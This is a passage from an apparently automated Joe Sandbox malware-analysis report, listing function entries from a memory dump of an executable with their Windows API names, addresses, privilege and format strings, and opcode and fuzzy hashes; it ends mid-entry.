                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: DloadHandleModuleProtectSection
                                                                    • String ID:
                                                                    • API String ID: 2883838935-0
                                                                    • Opcode ID: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
                                                                    • Instruction ID: a66afebdae9063f59040287c728f578218b5095e2aafcabd684898c29126331e
                                                                    • Opcode Fuzzy Hash: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
                                                                    • Instruction Fuzzy Hash: EA11CC62D08507A1FB52BB19E8453B0A350BF04348FF80938C94D862B5EFBCA495B730
                                                                    APIs
                                                                      • Part of subcall function 00007FF731C8407C: FindFirstFileW.KERNELBASE ref: 00007FF731C840CB
                                                                      • Part of subcall function 00007FF731C8407C: FindFirstFileW.KERNEL32 ref: 00007FF731C8411E
                                                                      • Part of subcall function 00007FF731C8407C: GetLastError.KERNEL32 ref: 00007FF731C8416F
                                                                    • FindClose.KERNELBASE(?,?,00000000,00007FF731C90791), ref: 00007FF731C83EBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1464966427-0
                                                                    • Opcode ID: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
                                                                    • Instruction ID: dd40485aa446cfb63e31cf9bdf689a60e9945424e514d4d694730bbeb54f8285
                                                                    • Opcode Fuzzy Hash: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
                                                                    • Instruction Fuzzy Hash: 3EF02862D0C24196DB50BB74A08027967609F0ABF4F742334DA3D077C7CE69D485D720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: File
                                                                    • String ID:
                                                                    • API String ID: 749574446-0
                                                                    • Opcode ID: fdea881a5ac41bc8476d4f771acb1fa358bbe6d5cd898be5f50fef914b09b9a2
                                                                    • Instruction ID: cc96ad5c3ea95f68220c23e9ce8ad654be2d6b428a9f922dae29097363d36d51
                                                                    • Opcode Fuzzy Hash: fdea881a5ac41bc8476d4f771acb1fa358bbe6d5cd898be5f50fef914b09b9a2
                                                                    • Instruction Fuzzy Hash: C9E08C12E2055582FB20BB6BD8896689320AF8CB84BD85031CE0C47721CF38C485C610
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID:
                                                                    • API String ID: 3081899298-0
                                                                    • Opcode ID: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
                                                                    • Instruction ID: 603ce3c4a993dcd41943d5ae438cc7d2b52914ffd4c571033818a49849ebb371
                                                                    • Opcode Fuzzy Hash: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
                                                                    • Instruction Fuzzy Hash: E0D0C916D09441A2EE10A639E89503C5360AF96735FF40721D67E81AE1CA5D9496A630
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 4292702814-0
                                                                    • Opcode ID: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                                                    • Instruction ID: b27f50488e376f937c9f0b6adb99ee4b54f46b9dec2abdd4704f8622235c18f7
                                                                    • Opcode Fuzzy Hash: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                                                    • Instruction Fuzzy Hash: 42F04965F1964771FF567A7299213BCD3946F94B80FA84C31C90E86281EEBCA881A230
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 4292702814-0
                                                                    • Opcode ID: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
                                                                    • Instruction ID: 06311209b55f3662e03b2ccce384b28b4186ef8abbe7b3cc5b1498c7686ce659
                                                                    • Opcode Fuzzy Hash: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
                                                                    • Instruction Fuzzy Hash: 40F0FE15F09287A5FF5677715C212B5D3915F54760FA94E30E92E862C1DDACE880A630
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
                                                                    • Instruction ID: d862967ace5450ebe9509220a4f1569b89a405ccba6ec9d2dbaaf5f7cf0f1b41
                                                                    • Opcode Fuzzy Hash: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
                                                                    • Instruction Fuzzy Hash: 88F0C832E08642A9FB24AB30E484379A761EB18B78FA94335D73C015D4CFA8D896D320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                    • API String ID: 2659423929-3508440684
                                                                    • Opcode ID: 035eeedd3e3c2ec45d20f61d654678d5710c61cc22f79d0aa5ad14446b6256e8
                                                                    • Instruction ID: 700c0803da9bea5ae972f340d9a6343fd82ea14a0a2b08363b54369909f5466a
                                                                    • Opcode Fuzzy Hash: 035eeedd3e3c2ec45d20f61d654678d5710c61cc22f79d0aa5ad14446b6256e8
                                                                    • Instruction Fuzzy Hash: D862D162F08783A9FB00EB74D4852BDA361FB457A4FA04231DA2C57AD9DFB8E581D314
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Concurrency::cancel_current_taskInit_thread_footer
                                                                    • String ID: %ls$%s: %s
                                                                    • API String ID: 3233655583-2259941744
                                                                    • Opcode ID: cc1c4c34171a6bb235fdcb5b80e9a2c079f2ebd0ebebc9d1ba56227bb0478327
                                                                    • Instruction ID: 3ec03380a81176a47914137c976a927d8d9edcdf619a7a3ef8bb5f7d3f6be1ae
                                                                    • Opcode Fuzzy Hash: cc1c4c34171a6bb235fdcb5b80e9a2c079f2ebd0ebebc9d1ba56227bb0478327
                                                                    • Instruction Fuzzy Hash: 4AB2CB62E1878262EB10BB25D4842BEE351FFC5790FA05336E79D53AD6EEACE140D710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfomemcpy_s
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 1759834784-2761157908
                                                                    • Opcode ID: f4511a10a764153de8bd46bbc9a62ab6f98d2375fe8a04f030b037aba6a1eadf
                                                                    • Instruction ID: 423ca97d91baa6945df7f14addbf5bb218ab5881398b6427dd6d3e730dc0d50b
                                                                    • Opcode Fuzzy Hash: f4511a10a764153de8bd46bbc9a62ab6f98d2375fe8a04f030b037aba6a1eadf
                                                                    • Instruction Fuzzy Hash: 97B25C72E081829BE725DE69D4407FDB7A1FB48388FA09135DA0A97B84CFBCE504DB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                    • String ID: rtmp
                                                                    • API String ID: 3587137053-870060881
                                                                    • Opcode ID: c19f8ddd3c56ddd6c1a988766fc40abef8126931994928a496f1049b320f1b0a
                                                                    • Instruction ID: 80d32b900868e52141b9d02f99f0ad0000b40258a180987822e1be7d81a07c61
                                                                    • Opcode Fuzzy Hash: c19f8ddd3c56ddd6c1a988766fc40abef8126931994928a496f1049b320f1b0a
                                                                    • Instruction Fuzzy Hash: CFF1E622F08A42A9EB10EB65D4801FDA7A1FB957C4FA01132EA4D43EA9DFBCD585D710
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 1693479884-0
                                                                    • Opcode ID: 98847fc0a0a84781d4ba02383bfb3443521a2b3df3f50960c1a44faee8b43a12
                                                                    • Instruction ID: 345c48a5dc01cba809912d4c1219fac46af783dd62b10789e5c17c3e0cb60c74
                                                                    • Opcode Fuzzy Hash: 98847fc0a0a84781d4ba02383bfb3443521a2b3df3f50960c1a44faee8b43a12
                                                                    • Instruction Fuzzy Hash: 21A1D362F14B5294FF00AB79C8845BDA361AF49BE4BA44235DE1D17FC9DEBCE441D210
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3140674995-0
                                                                    • Opcode ID: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
                                                                    • Instruction ID: edf52cb6acd81b9d4bd34d48758eaff407084a5388978099dd04dd2d3a295eff
                                                                    • Opcode Fuzzy Hash: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
                                                                    • Instruction Fuzzy Hash: 46315E72A09B8199EB60EF60E8503EDB360FB84B44F944439DB4E47A98DF7CD548D720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
                                                                    • Instruction ID: d3d81905b7ffa7872f65786c907fc006b6bcaf73589bba125f04abcbe0e0f73f
                                                                    • Opcode Fuzzy Hash: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
                                                                    • Instruction Fuzzy Hash: CD31A436A08B81A5D721DF25E8403AEB3A0FB88B54FA40535EE9D43B98DF7CC545CB10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3668304517-0
                                                                    • Opcode ID: e4f76085d4319caec31d13061860d09f6c594104b8d6fbbba7e66862e16aba8c
                                                                    • Instruction ID: 42920fd6e357c39ba5bd4c9a168ef8af081edaa39230ace27cd103dd5879a47e
                                                                    • Opcode Fuzzy Hash: e4f76085d4319caec31d13061860d09f6c594104b8d6fbbba7e66862e16aba8c
                                                                    • Instruction Fuzzy Hash: 03B1D162F14782AAEB10BF65D8442EDA361FB89794FA05631EA4C07BD9DFBCE540D310
                                                                    APIs
                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF731CAFA44
                                                                      • Part of subcall function 00007FF731CA78B4: GetCurrentProcess.KERNEL32(00007FF731CB0C4D), ref: 00007FF731CA78E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                    • String ID: *?$.
                                                                    • API String ID: 2518042432-3972193922
                                                                    • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                    • Instruction ID: e6b782c029dd3ee2b6ddac360eb03a8f2194bc38f52e6c3a52b3ac465301c310
                                                                    • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                    • Instruction Fuzzy Hash: 1F510562F14B9591FB12EFA298110FCA7A4FF44BD8BA48931DE1D17B85DEBCD4429320
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 1502251526-0
                                                                    • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                    • Instruction ID: dfa5de050e085192e565165cd343d975d42577e3ea5f3776363eed701d3a5ffe
                                                                    • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                    • Instruction Fuzzy Hash: AAD1CF32B1928697DB34DF15E1846AAB7A1FB88784FA48134DB4E97B44CA3CF841DB40
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                    • String ID:
                                                                    • API String ID: 1365068426-0
                                                                    • Opcode ID: a3eefe559d296bd36c1cae37cf4e1e300267d0d32691df0dd3a6d40942d78c6b
